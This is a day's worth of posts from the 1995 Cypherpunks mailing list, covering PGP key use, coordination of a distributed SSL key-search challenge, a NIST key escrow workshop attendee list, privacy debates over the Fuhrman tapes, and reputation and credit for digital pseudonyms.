the option of abbreviating the name? 2) Can keys and files be shared between multiple machines, i.e. the same user keys on a desktop and laptop, so that individual encrypted files can easily be moved back and forth? #--- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From stewarts at ix.netcom.com Fri Sep 1 12:15:40 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Fri, 1 Sep 95 12:15:40 PDT Subject: O.J. ObCrypto: Fuhrman's Folly Fans Fakery Fears... Message-ID: <199509011912.MAA29475@ix8.ix.netcom.com> >I do not think that PGP 2.x can easily (ie: Automatically) use one key for >Signing and another for Encrypting a Message (it does both at the same time >if you ask). If I "Clear Sign" a message and then Encrypt it, then I get >the result but I'm not sure if doing the decrypt on such a message will >automatically spot the signature and verify it (as would occur with a E+S >pass). PGP identifies the key for decryption and signature checking from the message. When you're signing a message or key, you can pick which of your keys to use with the -u option. The difficulty is getting people to use your encryption key instead of your signature key when encrypting stuff for you. Derek mentioned one approach (get people to load the encryption key first); unfortunately, you can't predict their behavior, and if you change encryption keys more often than signature keys, they'll load the newest encryption key last. Another approach is to identify them in the names - my key certification key says "KeyCert-only" in the text. For the problem that started this discussion, though, there's no good solution. Since the Bad Guys _can_ encrypt a message to you with your signature key, and send it to you by anonymous remailer, they can plant a reason to suspect that you may have evidence encrypted with that key. #--- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From rkw at dataplex.net Fri Sep 1 12:47:20 1995 From: rkw at dataplex.net (Richard Wackerbarth) Date: Fri, 1 Sep 95 12:47:20 PDT Subject: SSL search attack Message-ID: I wrote >>> Assuming that you are multi-threaded--- Simply run two "workers" on the >>> same machine. If there are delays in getting keys assigned, the two will >>> soon get out of phase and keep the cpu busy. >> I kind of like that idea... > To which Piete Brooks replied: >I thought of that, but: >1) for the same server load, it doubles the number of unACKed segments >2) if process A is lagging process B, then when process B finishes and is idle > waiting for the server, process A will run faster and thus reduce the lag. > This will make the processes drift into phase. > I'm not convinced one way or the other. But you forgot that when process A finishes, process B will run faster and re-establish its lead. The real question is what is the parameter that we need to minimize? Assuming that the key is distributed in the keyspace with a uniform probability, then what we need to minimize is the expectation that two or more workers are searching the same keyspace. As long as we never reach the point that all of the keys have been distributed, it does not matter how many or in what method they are assigned. (The "fairness" WRT a prize being ignored) The assignments only become important as we exhaust the space and must prepare to make another pass. Note that we never got to that point on challenge 2. The assignment of the block containing the key was processed on its first pass and the key was found. In this regard, it is probably "best" to first attempt to identify those space assignments that have been lost. If we associate with each key, either explicitly, or by inference, an expected completion time, those segments which are most overdue are certainly good candidates for having been lost. Based on our previous try, and the assumption that we would not have extremely different resources available, the master allocator would not NEED to get reports back for the first say 12 hours. That is not to imply that reports should be delayed that long, but only that there is considerable opportunity to have a hierarcy of intermediate collectors that have plenty of time to adjust their allocation algorithms to match the ability of their workers. Later, more rapid response would be needed. When the required response becomes too small for the "little guys", they could be sloughed off on the next problem, leaving the "big boys" to clean up the last pieces. Of course, the "next" problem might be to resolve the same problem because the correct answer was incorrectly reported as not found. As I see it, except for perhaps the fastest of machines there is little reason to allocate to the workers more than one segment at a time. Their supervisor can quickly respond to requests for work and consolidate the results to be passed up the chain. The only reason that I can see to separate the acks from the assignments is to be able to have "memory-less" nodes. This is certainly unnecessary if there is a web of supervisor servers. I have a lot more thoughts that I will defer to the next missive. Gotta' run... ---- Richard Wackerbarth rkw at dataplex.net From pfarrell at netcom.com Fri Sep 1 13:28:27 1995 From: pfarrell at netcom.com (Pat Farrell) Date: Fri, 1 Sep 95 13:28:27 PDT Subject: Key Escrow Workshop agenda & discussion paper 3 Message-ID: <59234.pfarrell@netcom.com> The following message segment: ------------------------------ From: Arlene Carlton Fri, 01 Sep 1995 15:30:46 -0400 Cc: carlton at micf.nist.gov Subject: Key Escrow Workshop agenda & discussion paper 3 September 1, 1995 Dear Participant: Thank you for agreeing to participate in the two-day meeting on software key escrow encryption. We are anxious to work with you and other industry representatives to facilitate development of exportable key escrow encryption in software products. I look forward to the workshop being an important step in that process. [snip] --------------------------------- Was sent to the following folks. I assume that this means that these people are participants. I see Dan W from CDT, Soble from EPIC and Whitfield Diffie, on our side, plus assorted folks with stakes such as tis.com and netscape.com And of course, DERD for the other side. Blank Unicorn had posted to c'punks that he was attending. Of course, while I know what he looks like, I have no idea which nym is his. Pat List of attendees/registered participants follows: 100436.3361 at compuserve.com, 73167.2027 at compuserve.com, 73534.3011 at compuserve.com, 75300.3232 at compuserve.com, 76225.2603 at compuserve.com, ablee at mitre.org, ads012 at email.corp.mot.com, ams at eit.com, amte09 at email.corp.mot.com, asteen at novell.com, baum at world.std.com, bekutz at aol.com, bflowe at mcimail.com, bill.poulos at oga.eds.com, bill.poulos at oga.eds.com, branstad at tis.com, bsaclu at aol.com, c.baggett at cablelabs.com, carol.donovan at network.com, ccrafton at gi.com, charlesabzug at acm.org, ckc at rfpo1.rfc.comm.harris.com, cmo at cohnmarks.com, coallen at us.oracle.com, cpadilla at attmail.com, cpadilla at attmail.com, csmith at steptoe.com, davery at grci.com, david_rose at ccm.fm.intel.com, ddodson at nist.gov, denning at cs.cosc.georgetown.edu, deyoung at rpcp.mit.edu, dinsmore at tis.com, djw at cdt.org, dkozlay at ire.com, dmiller at spa.org, Don_Sortor-ads012 at email.corp.mot.com, ebarker at nist.gov, ed at tecsec.com, emessmer at world.std.com, ezzy_dabbish-amte09 at email.corp.mot.com, flahavin at csmes.ncsl.nist.gov french at zeke.enet.dec.com, gomes at dockmaster.ncsc.mil, gordon at ipower.nsc.com, hoffman at seas.gwu.edu, housley at spyrus.com, hoydyshd at mcln.unisysgsg.com, i.goldsmith at nexor.co.uk, infocker at megaweb.com, jackk at microsoft.com, jag at jgvandyke.com, jaltman at milchev.com, jamanni at missi.ncsc.mil, james.hughes at network.com, jdrandall at vnet.ibm.com, jean_m_baronas at co.xerox.com, jeff.rulifson at Eng.Sun.COM, jeff at netscape.com, jerry at ods.com, jgheiner at aol.com, jimmy at ipower.nsc.com, jimn at calv1.cray.com, jkrauss at cpcug.org, john at ipower.nsc.com, john_pascatore at ivision.com, jroberts at cmp.com, js at cup.hp.com, jseiger at cdt.org, jwinston at ota.gov, jya at pipeline.com, jya at pipeline.com, kandy at micf.nist.gov, karen.randall at att.com, kawamoto at mitre.org, kaye at ix.netcom.com, kent_landfield at sterling.com, khrose at annap.infi.net, klensin at mci.net, lc2m at andrew.cmu.edu, lcarnahan at nist.gov, lhg at nrc.gov, lovornj at usva8.dyncorp.com, lshomo at hqops.hq.nasa.gov, lthrash at hqamc.army.mil, lydia.bell at tip.navsea.navy.mil, maitgmu at aol.com, martin.ferris at treas.sprint.com, mary_smolenski at ita.doc.gov, mbohannon at banyan.doc.gov, mccord at nosc.mil, melanie.carter-maguire at nt.com, mendelson at tis.com, mfa at compaq.com, michael.palgon at sciatl.com, mignon at atc.boeing.com, mikus at viacrypt.com, mjl at liii.com, mpapillo at snap.org, mpapillo at snap.org, mppulkk at mikropc.fi, mrainey at itic.nw.dc.us, murray2 at vnet.ibm.com, natstrat at dgs.dgsys.com, nazario at csmes.ncsl.nist.gov, paradise at wellsfargo.com, pfarrell at netcom.com, pjclark at ix.netcom.com, po7114 at email.mot.com, polk at csmes.ncsl.nist.gov, powar at visa.com, randy at mci.net, ravenis at novell.wd.cubic.com, rjg9324 at glaxo.com, rjoconnor at aol.com, rmedlock at mitre.org, roberth at bsa.org, rolfe.doc.gov at micf.nist.gov, rozzie at iris.com, rwessman at us.oracle.com, sbaker at steptoe.com, Schneck at mitre.org, Schneck at ncsl.nist.gov, sevans at csn.com, shabbir at panix.com, simona at sea.org, sking at mitre.org, sltm at msg.ti.com, snouffer at st1.ncsl.nist.gov, sobel at epic.org, squires at arpa.mil, stuart at bellcore.com, stw at atc.boeing.com, sullivan at interramp.com, tajalli at tis.com, tec.teclgl at micf.nist.gov, ted_gerbracht at ml.com, tfuhrman at ostp.eop.gov, thomas_clare at sterling.com, trivers at is.ge.com, trstsc at tevm2.nsc.com, ttobin at atl.ge.com, wafranklin at attmail.com, walker at tis.com, walt at osf.org, walters at snad.ncsl.nist.gov, wford at bnr.ca, whitehurst at vnet.ibm.com, whitfield.diffie at Eng.Sun.COM, whpayne at abq-ros.com, wmcglone at milchev.com, wright at dockmaster.ncsc.mil, Pat Farrell Grad Student http://www.isse.gmu.edu/students/pfarrell Info. Systems & Software Engineering, George Mason University, Fairfax, VA PGP key available on homepage #include From jeffb at sware.com Fri Sep 1 14:01:12 1995 From: jeffb at sware.com (Jeff Barber) Date: Fri, 1 Sep 95 14:01:12 PDT Subject: Fuhrman needed a digital pseudonym! In-Reply-To: Message-ID: <9509012100.AA07333@wombat.sware.com> Timothy C. May writes: I almost always agree with Tim. This time I have to differ -- I think his outrage at the course of the OJ trial has fogged his head. > * This post is primarily about the role of pseudonyms, not the OJ trial or > the testimony/tapes involving Mark Fuhrman. Well, it's hard to see that from reading the rest of it. > Before you folks jump on the "racist" Mark Fuhrman, think about the > "surveillance state" issues. While it was not any government organization > that taped Fuhrman's comments, there are some real issues involved in how > deeply and how far back we want to "mine" comments made by people. Some > real issues of privacy. I don't see any "surveillance state" issue. Fuhrman openly agreed to speak to the screenwriter. AFAIK, he had no reason to believe the screenwriter wouldn't tell anyone else. Nor should he have counted on that anyway. Any loss of credibility (or other penalty) he receives is entirely deserved, IMO. If he didn't want his words coming back to "haunt" him, he shouldn't have spoken them, in this setting at least, whether they were sincere or merely an attempt to puff himself up in her eyes. Speaking as a "consultant" (or whatever he imagined his relationship with the screenwriter to be) isn't the same as speaking in confidence to your best friend in a private setting anyway. > Anyone in favor of heading off the "surveillance society" should be alarmed > at this development. As tape recorders and video cameras proliferate, > comments may be compiled, taken out of context, and used as evidence. I am not alarmed in the least (by this development, anyway). There's no evidence that Fuhrman's comments are being taken out of context. Fuhrman freely entered into the arrangement wherein his comments were recorded. Let's face it, the most likely explanation here is that Fuhrman is a lying scumbag. The fact that Fuhrman may be a lying scumbag doesn't make OJ any less guilty. However, it does throw a lot of suspicion on Fuhrman's testimony. OJ's entire defense has been based on the claim that Fuhrman and other LAPD members lied and otherwise conspired in order to frame him. These tapes are clearly appropriate to that defense whether you believe the defense a valid one or not. > But have people given up the right to speak "for themselves" in private? If > there is no solid evidence that Fuhrman actually committed any crimes, but > only appeared to be puffing himself up, a la a Wambaugh wannabee, then why > are his "racist" and "sexist" comments deemed so important as to have > derailed the trial for the last couple of weeks? The fact that Fuhrman's comments are racist or sexist are not the point. What is important is that he lied in court about having made those statements. If he or the prosecution believes that a case can be made that Fuhrman was just puffing himself up, then they should try to convince the jury of that. > To be sure, there are valid trial issues: > > -- Did he misspeak, misremember, or lie when he said he had "never" used > the word "nigger" in the past 10 years? Yes, IMO, this is the important issue. Anyone who dispenses racial epithets with the ease he apparently displayed in the tapes is an idiot to have made such a claim whether the tapes were puffery or not. > -- If this is perjury, how does it affect other evidence? (I'm not a > lawyer, but I grok from the comments on CNN that this has to do with > whether his testimony was supportive of other evidence, "cumulative," and > related issues.) IANAL, but let me just say that if I were on the jury, I don't think I'd believe a single word he'd said during the trial. I think that I would probably still believe him to be guilty, anyway, but it's hard to be sure without having heard only what the jury has heard. > -- Does this possible misspeaking, misremembering, or lying have anything > to do with whether he planted the bloody glove? I don't know. I'm kinda amazed that Ito has said that other portions of his taped words won't be used, such as those parts where he describes manufacturing evidence against the accused. That seems to me to be clearly relevant, at least as relevant as his use of the n-word. > Anyway, I am greatly disturbed by this "mining" of ancient comments, made > to a screenwriter. Not me. A few weeks there was a thread concerning the use of information by private "reputation" bureaus. I can't find the thread in the archives but I seem to recall you defending the right of private entities to keep and distribute such information (my apologies if this was someone else). Anyway, to me, these tapes fall clearly in the same domain. This screenwriter isn't a government agency, the information was freely given, and the screenwriter has every right to offer it for whatever purpose she deems appropriate, for free or for money (barring any agreements to the contrary, of which I have heard nothing). -- Jeff From warlord at MIT.EDU Fri Sep 1 14:14:53 1995 From: warlord at MIT.EDU (Derek Atkins) Date: Fri, 1 Sep 95 14:14:53 PDT Subject: Different Keys for Signing and Encrypting In-Reply-To: <199509011912.MAA29475@ix8.ix.netcom.com> Message-ID: <9509012114.AA00959@m37-332-6.MIT.EDU> > unfortunately, you can't predict their behavior, and if you change > encryption keys more often than signature keys, they'll load the > newest encryption key last. Actually, the most recently-added key will be the one that is used.. So updating your encryption key works fine, since the most recent encryption key will be on top, and hense used first. > For the problem that started this discussion, though, there's no good > solution. Since the Bad Guys _can_ encrypt a message to you with your > signature key, and send it to you by anonymous remailer, they can > plant a reason to suspect that you may have evidence encrypted with > that key. True.. To get around this problem you need the concept of a two-key certificate... However a rogue user could still use the signature key to encrypt, so I'm not sure that even this would help the problem. -derek From tcmay at got.net Fri Sep 1 14:21:55 1995 From: tcmay at got.net (Timothy C. May) Date: Fri, 1 Sep 95 14:21:55 PDT Subject: Fuhrman needed a digital pseudonym! Message-ID: At 9:00 PM 9/1/95, Jeff Barber wrote: >I don't see any "surveillance state" issue. Fuhrman openly agreed to >speak to the screenwriter. AFAIK, he had no reason to believe the >screenwriter wouldn't tell anyone else. Nor should he have counted on >that anyway. Any loss of credibility (or other penalty) he receives >is entirely deserved, IMO. By the way, McKinny did not volunteer the tapes, nor did she consent to having them taken from her and used by the Defense. Private property was taken by a court action (the North Carolina lower court ruled that the tapes were the property of McKinny and could not be taken, then an appeals court overruled this decision and ordered McKinny to produce the tapes). (It is not clear how Cochrane and his team learned of the tapes. Speculation is that McKinny's agent or lawyer was doing some freelance shopping-around of the script. McKinny has denied that she was trying to sell the tapes. Regardless, they are her property and should only come in to a court case when directly and centrally involved. This is closely related to the Church of Scientology issue, and is being debated on another mailing list I'm on, the Cyberia list.) This raises serious issues. She was a screenwriter, Fuhrman was helping her to generate a salable script. Neither was speaking for the LAPD. (Kind of like the disclaimers we see on the Net, which I suspect are becoming worthless.) >> Anyway, I am greatly disturbed by this "mining" of ancient comments, made >> to a screenwriter. > >Not me. A few weeks there was a thread concerning the use of >information by private "reputation" bureaus. I can't find the thread >in the archives but I seem to recall you defending the right of >private entities to keep and distribute such information (my apologies >if this was someone else). Anyway, to me, these tapes fall clearly in You're imputing to my comments about what will happen, and what cannot be stopped except by coercion, a conclusion which you think is at odds with my point here. Just because I think people (like me, you, Laura McKinny, etc.) have the "right" to compile records, make notes, make tapes of conversations, etc., does not mean I think that courts can order them given to the court. (This is an issue I have with "discovery" in general, where even peripheral witnesses can be compelled to turn over diaries, journals, letters, tapes, records, financial reports, etc.) >the same domain. This screenwriter isn't a government agency, the >information was freely given, and the screenwriter has every right to >offer it for whatever purpose she deems appropriate, for free or >for money (barring any agreements to the contrary, of which I have >heard nothing). Again, to make it clear, McKinney did not offer the material and fought in the North Carolina courts to have her property kept confidential. The court ordered her to turn it over. (And apparently members of the defense team leaked the most damaging, and out of context, parts, provoking Ito to announce a major investigation of this is to come, with severe sanctions for those who leaked it.) We need a justice system which will not be dragged into spending a full year on this matter, with every indication that a mistrial or hung jury will result. I look forward to a day in which an OJ would get a reasonable, month-long trial...and then, if found guilty, be given an execution date no longer than a month away. As it is, OJ will be guesting on the talk show circuit. He butchers two people--from the overwhelming mound of evidence I've seen--and essentially cuts the head off of his ex-wife, but will likely get off as this trial spins out of control and fragments in various ways. Don't misunderstand my motivations: I'm sort of happy this is all happening. It makes people even more suspicious of governments and lawyers, and it will accelerate the disintegration of the current system. --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From terrell at sam.neosoft.com Fri Sep 1 15:09:28 1995 From: terrell at sam.neosoft.com (Buford Terrell) Date: Fri, 1 Sep 95 15:09:28 PDT Subject: Fuhrman needed a digital pseudonym! Message-ID: <199509012218.RAA23055@sam.neosoft.com> > >From: tcmay at got.net (Timothy C. May) >Subject: Fuhrman needed a digital pseudonym! >Before you folks jump on the "racist" Mark Fuhrman, think about the >"surveillance state" issues. While it was not any government organization >that taped Fuhrman's comments, there are some real issues involved in how >deeply and how far back we want to "mine" comments made by people. Some >real issues of privacy. > >The Mark Fuhrmans of the future may be interested in using technologies to >protect their privacy, to give them "plausible deniability" should their >recorded words come back to haunt them. > ... >* And the issue of "mining" of ancient records, especially as technology >makes the recording of sounds, the taping of sights, and the archiving of >electronic messages so much easier. > ... >What really bothers me, as it relates to the pro-privacy themes of this >list, is the reaching back many years to comments made by a witness--Mark >Fuhrman--to a screenplay writer. Because she kept audiotapes, going back 10 >years, these comments may likely strongly influence the verdict in this >"trial of the century." > >Anyone in favor of heading off the "surveillance society" should be alarmed >at this development. As tape recorders and video cameras proliferate, >comments may be compiled, taken out of context, and used as evidence. ... > >--Tim May > If you've ever watched Not_at_all_Funny Home Videos or any of the American Urinal school of tabloid television, you soon start feeling that the real threat to privacy is not the guvmint, but all of the yoyos with their little cam corders running around pointing them at people. Security cameras in ATMS and at airline ticket counters do more to threaten you privacy than do FIBBIE wiretaps, and PGP won't protect you from them. (and usually neither will the courts). Buford C. Terrell 1303 San Jacinto Street Professor of Law Houston, TX 77002 South Texas College of Law voice (713)646-1857 terrell at sam.neosoft.com fax (713)646-1766 From starrd at iia2.org Fri Sep 1 15:13:26 1995 From: starrd at iia2.org (starrd) Date: Fri, 1 Sep 95 15:13:26 PDT Subject: Web of Trust In-Reply-To: <199509011201.GAA01376@wero> Message-ID: On Fri, 1 Sep 1995 don at cs.byu.edu wrote: > I am requesting that all "active" cypherpunks/cyphergroupies please send me > their key number, IF it's already on the keyservers. If it's recently put > there, be sure to tell me or I will be annoyed. If it's not there at all, > I'll be annoyed. Personally annoyed, not I-ran-some-scriptfile annoyed. If > you searched any of the RC4 or SSL keyspace, for example, I'm interested. > If you post messages occasionally, [conspiracypunks need not apply] I'm > interested. If you generated a key because your neighbor taught you how, > don't bother. Hi, Please feel free to ad my key to your keychain and/or keyserver. I am a cyberpunk in the most original sense. From the early '80s the days of 8BBS & 414's, etc. I am also in the book "CyberPunks" [now in your book store] see who signed my key, and you'll have a clue who I am. Enjoy the key! ||||||||||||email address: starrd at iia2.org or starrd at cinenet.net||||||||||| | Creator of the original | Get paid to upload | | Patriot's Archives \ shareware to BBSes and | | ftp: iia.org /pub/users/patriot \_____ the Internet! | | ftp: wuarchive.wustl.edu /pub/msdos_uploads/patriot\ Get file: | | For index of available files: descript.ion \ uploader.zip | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||| -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQCNAzAN3FwAAAEEAOgWK9QJo3LIPXC+C/RHE+nmlddXPthC0hgLL7oKg7WPjYgk LrX7j0eUmb5e6t2sm/PkJ1wjk839fqjUmRPLD0mhPX6KsMB0DoecYbCKLrNUY1gP 7DZijj9e7fuPaHqhuY7K5rGjN4po4ZxGhEPQv32IjQLSza9nbU05aMuMG71tAAUR tB9EYXZpZCBXIFN0YXJyIDxzdGFycmRAaWlhMi5vcmc+iQCVAwUQMCnJQEY2REVK Mit9AQG9AAQAps4lKzeQ/OQyXbvxG4b5wWsvHEK/K+1L/tfG0+EmlEsDARaN2pBD cCslIKHjBa8al2BaTSsNjCUSHMgd+IWRp+nw2XJt/lRqpvTN5m7pPNAEQbSgCGwf 9kJ1IDPMokOw9XXAuGAqMQi9HogepNxp7JOdNphcJulHf9XbyCy/sig= =0Tlq -----END PGP PUBLIC KEY BLOCK----- From syrinx at c2.org Fri Sep 1 15:27:13 1995 From: syrinx at c2.org (Syrinx Anonymous Remailer) Date: Fri, 1 Sep 95 15:27:13 PDT Subject: CIA & Espionage Message-ID: <199509012222.PAA13146@infinity.c2.org> 'Tatu Ylonen' was reported to have written: > I do find it rather shocking that the most powerful country in the > world sets industrial espionage as the primary task of their > intelligence services. Well, I have a letter from a United States Senator which was received last year in response to my phone call in opposition to the Digital Telephone Act of 1994 (S. 2375). Here's the interesting part: "According to the director of the Federal Bureau of Investigations (FBI), Louis Freeh, the number one law enforcement, public safety, and national security issue facing us today is preserving the ability to conduct court approved wiretaps." In other words, retaining the ability to monitor citizen communications is their greatest concern. This should be more than shocking to anyone who cares about privacy. It appears as though the primary function of the FBI and the "intelligence services" are similarly directed. One significant distinction is that the FBI's stated mission is directed toward the "owners of the country" (to borrow a term from Perot). From mfroomki at umiami.ir.miami.edu Fri Sep 1 15:34:33 1995 From: mfroomki at umiami.ir.miami.edu (Michael Froomkin) Date: Fri, 1 Sep 95 15:34:33 PDT Subject: Phil Zimmermann/Amnesty International? In-Reply-To: <199509011410.KAA20234@libws1.ic.sunysb.edu> Message-ID: I think he would have to be charged first. Have I missed something? PS when does the statute of limitations run out? A. Michael Froomkin | +1 (305) 284-4285; +1 (305) 284-6506 (fax) Associate Professor of Law | mfroomki at umiami.ir.miami.edu U. Miami School of Law | P.O. Box 248087 | It's hot there. And humid. Coral Gables, FL 33124 USA | But I'm elsewhere.... See (experimentally & erratically) http://viper.law.miami.edu/~mfroomki From davidm at iconz.co.nz Fri Sep 1 15:46:04 1995 From: davidm at iconz.co.nz (David Murray) Date: Fri, 1 Sep 95 15:46:04 PDT Subject: A problem with anonymity Message-ID: <199509012245.KAA27969@iconz.co.nz> -----BEGIN PGP SIGNED MESSAGE----- Tim May said in article : > At 11:32 PM 8/31/95, Scott Brickner wrote: .. > >he sells its assets to his own identity at a fraction of their worth, > >and defaults on the liabilities. > ^^^^^^^^^^^^^^^^^^^^^^^^^^^ .. > ideally, one never "trusts" an agent with a transaction greater than the > value of the reputation capital he will lose if he defaults. .. > Whether cryptographic protocols (cf. the "encrypted open books" proposal by > eric Hughes for one approach which may be useful) solve this problem is not > known at this time. But the non-crypto world has of course not solved this > problem, either. I've often thought that in a system of digital pseudonyms, where no-one need trade with a negative reputation (a reputation deficit?), something like Akerlof's Market for Lemons will arise, and _all_ pseudonyms will be treated as (reputationally) worthless. [Akerlof, if I remember my economics right (and I am confident that I will be corrected if I don't) analysed a market for used cars. There were two types of cars: good ones, and lemons. A purchaser couldn't tell the difference until she had bought the car. Since the expected value of a used car was less than the value of a good car, purchasers wouldn't pay the good car price. But that would mean owners of good cars wouldn't offer them for sale (in this market). So the only cars for sale would be lemons :-)] As Tim points out, this is a non-crypto problem as well, and devices such as bonds or (which are game-theoretically similar) expensive advertising or plush premises [if they spent an unrefundable $20million on the Rolling Stones, they're not likely to throw it all away by ripping you off for $100 ;-)] are used to convince potential customers of one's bona fides. How these transfer to the world of cyber-finance, I'm not sure, but I suspect it leaves a role for True Names in the management of credit risk: as escrow agents, middlemen, clearing houses etc. [Although, having said that, if the Akerlof analysis applies, you just *can't* grant (unsecured) credit to pseudonyms - the percentage of defaulters will be 100...] But these Names are True only in the sense that they are juridically persistent (that is, if they transact today, they can be sued tomorrow), and need not be traceable to any True People (Warm Bodies?) - anonymously held corporations, for example. If you can't rely on the unsecured promise of a digital pseudonym, and you can't accept reputation as 'security', how do you extend credit? Dm -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMEd+81lo3j8JHzalAQFo0AQAkohUuFg6QwRaY7X5LwF1YXCby1uCKQmI FfmQHmEa55oeht9Vc4DN1V+dIGjVWRIxS3ib/oRYsXY9HWo8pI3gMKhbnsBf3OzN jVuoUR8Tgx1HcX59uBjbpxKNHFw5U4gPN70zvbLJhbw1UHWr24tq5RJri22coCh7 1Dm016RMHns= =rl4c -----END PGP SIGNATURE----- From dawagner at phoenix.Princeton.EDU Fri Sep 1 16:10:20 1995 From: dawagner at phoenix.Princeton.EDU (David A. Wagner) Date: Fri, 1 Sep 95 16:10:20 PDT Subject: Cryptanalysis of S-1 In-Reply-To: Message-ID: <9509012308.AA17004@tucson.Princeton.EDU> Ted_Anderson at transarc.com writes: > Further we have a concrete design principle: the per-round sub-keys > should not repeat. Right. In fact, this design principle has been known for a long time: the earliest reference I know of is @inproceedings{subkeys-important, author = {Edna K. Grossman and Bryant Tuckerman}, title = {Analysis of a Weakened {Feistel}-like Cipher}, booktitle = {1978 International Conference on Communications}, pages = {46.3.1--46.3.5}, publisher = {Alger Press Limited}, year = {1978}, annote = {Feistel ciphers with identical subkeys in each round are very weak} } ------------------------------------------------------------------------------- David Wagner dawagner at princeton.edu From tcmay at got.net Fri Sep 1 16:51:13 1995 From: tcmay at got.net (Timothy C. May) Date: Fri, 1 Sep 95 16:51:13 PDT Subject: Surveillance a Growing Problem Message-ID: (I've changed the thread name from "Fuhrman...." to the topic being discussed here.) At 10:56 PM 9/1/95, Buford Terrell wrote: >If you've ever watched Not_at_all_Funny Home Videos or any of the >American Urinal school of tabloid television, you soon start feeling >that the real threat to privacy is not the guvmint, but all of >the yoyos with their little cam corders running around pointing them >at people. > >Security cameras in ATMS and at airline ticket counters do more >to threaten you privacy than do FIBBIE wiretaps, and PGP won't >protect you from them. (and usually neither will the courts). I absolutely agree with this, though this doesn't mean I'll stop worrying about the government's plans for key escrow (GAK), about limits on key lengths, or about other efforts to thwart strong security. But clearly the "technologies of surveillance," ranging from massively-cross-correlated mailing lists to smaller and cheaper and more ubiquitous video cameras, are very nearly an equal threat. (Lots of issues, from the nearly universal requests for Social Security Numbers, to the growing powers of courts to compel the disclosure of private documents, to, well, you folks all know the trends.) Folks like us should not be lobbying for limitations on what other private individuals or companies are doing, but should concentrate first, on technological alternatives (encryption, unlinkable credentials, digital money, that sort of thing) and second, on educating others that security and privacy is best self-arranged and is rarely accomplished by government assuming the role of protector. --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From tcmay at got.net Fri Sep 1 17:07:53 1995 From: tcmay at got.net (Timothy C. May) Date: Fri, 1 Sep 95 17:07:53 PDT Subject: A problem with anonymity Message-ID: At 10:45 AM 9/2/95, David Murray wrote: >I've often thought that in a system of digital pseudonyms, where no-one need >trade with a negative reputation (a reputation deficit?), something like >Akerlof's Market for Lemons will arise, and _all_ pseudonyms will be treated >as (reputationally) worthless. Doubtful, as we already have evidence that people are treating some digital pseudonyms as reputationally valuable. Examples abound. >[Akerlof, if I remember my economics right (and I am confident that I will >be corrected if I don't) analysed a market for used cars. There were two >types of cars: good ones, and lemons. A purchaser couldn't tell the difference >until she had bought the car. Since the expected value of a used car was less >than the value of a good car, purchasers wouldn't pay the good car price. >But that would mean owners of good cars wouldn't offer them for sale (in >this market). So the only cars for sale would be lemons :-)] I haven't encountered this example, but it clearly misses some important real-world issues. First, people buying used cars are strongly advised to take the car to an independent mechanic to be checked out (a kind of variant of the "cut-and-choose" protocol at work). This often reveals lemons. Second, people take test drives, look under the hood, kick the tires, etc. This also often reveals lemons. Third, the reputation of the used car dealer is, despite nearly a century of jokes to the contrary, often very important. The last two cars I've bought I bought used--albeit with low mileage on each--from car dealers. I took test drives and got a limited warranty in each case. The first car I drove for 12 years with essentially no problems, the second I've been driving for almost 3 years. Like a lot of simple game-theoretic models, the application to the real world is quite different. But I certainly agree that crypto will reignite interest in analyses of such game theory questions. Another way of viewing anonymity vs. non-anonymity is that knowing the True Name of a party with whom one trades is just _one element_ of a transaction. By no means is it essential. (Think of various trading situations where one has no idea of the True Name of the other parties: cash-and-carry transactions, flea markets, many international trade arrangements, etc. As we have discussed in past discussions of anarchy, the international trading regime is essentially an anarchy, in that no Higher Authority exists to resolve disputes in a top-down way...the so-called "Law Merchant" evolved to resolve disputes in such trading situations.) >As Tim points out, this is a non-crypto problem as well, and devices such as >bonds or (which are game-theoretically similar) expensive advertising or >plush premises [if they spent an unrefundable $20million on the Rolling >Stones, they're not likely to throw it all away by ripping you off for >$100 ;-)] are used to convince potential customers of one's bona fides. > >How these transfer to the world of cyber-finance, I'm not sure, but I suspect >it leaves a role for True Names in the management of credit risk: as escrow >agents, middlemen, clearing houses etc. [Although, having said that, if the >Akerlof analysis applies, you just *can't* grant (unsecured) credit to >pseudonyms - the percentage of defaulters will be 100...] But these Names are >True only in the sense that they are juridically persistent (that is, if >they transact today, they can be sued tomorrow), and need not be traceable >to any True People (Warm Bodies?) - anonymously held corporations, for >example. > >If you can't rely on the unsecured promise of a digital pseudonym, and you >can't accept reputation as 'security', how do you extend credit? I am willing to extend some amound of credit to PrOduct Cypher, Black Unicorn, etc., based on their past reputation and on the fact that I can show to others the transactions into which their pseudonyms entered and thus expose them if they default. Now _how much_ I'm willing to extend is of course a more complicated issue, but the principal is still there: a purely digital pseudonym, with no possibility of being tied to a True Name, can still be extended credit....I just said I would do so. --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From adwestro at ouray.cudenver.edu Fri Sep 1 17:19:06 1995 From: adwestro at ouray.cudenver.edu (Alan Westrope) Date: Fri, 1 Sep 95 17:19:06 PDT Subject: Phil Zimmermann/Amnesty International? In-Reply-To: Message-ID: On Fri, 01 Sep 1995, Michael Froomkin wrote: > I think he would have to be charged first. Have I missed something? > PS when does the statute of limitations run out? June '96. Zimmermann and Dubois appeared on a local talk radio show recently; a friend happened to catch the program, taped it, and played excerpts at a Cypherpunks meeting. This date was mentioned by Phil Dubois. Alan 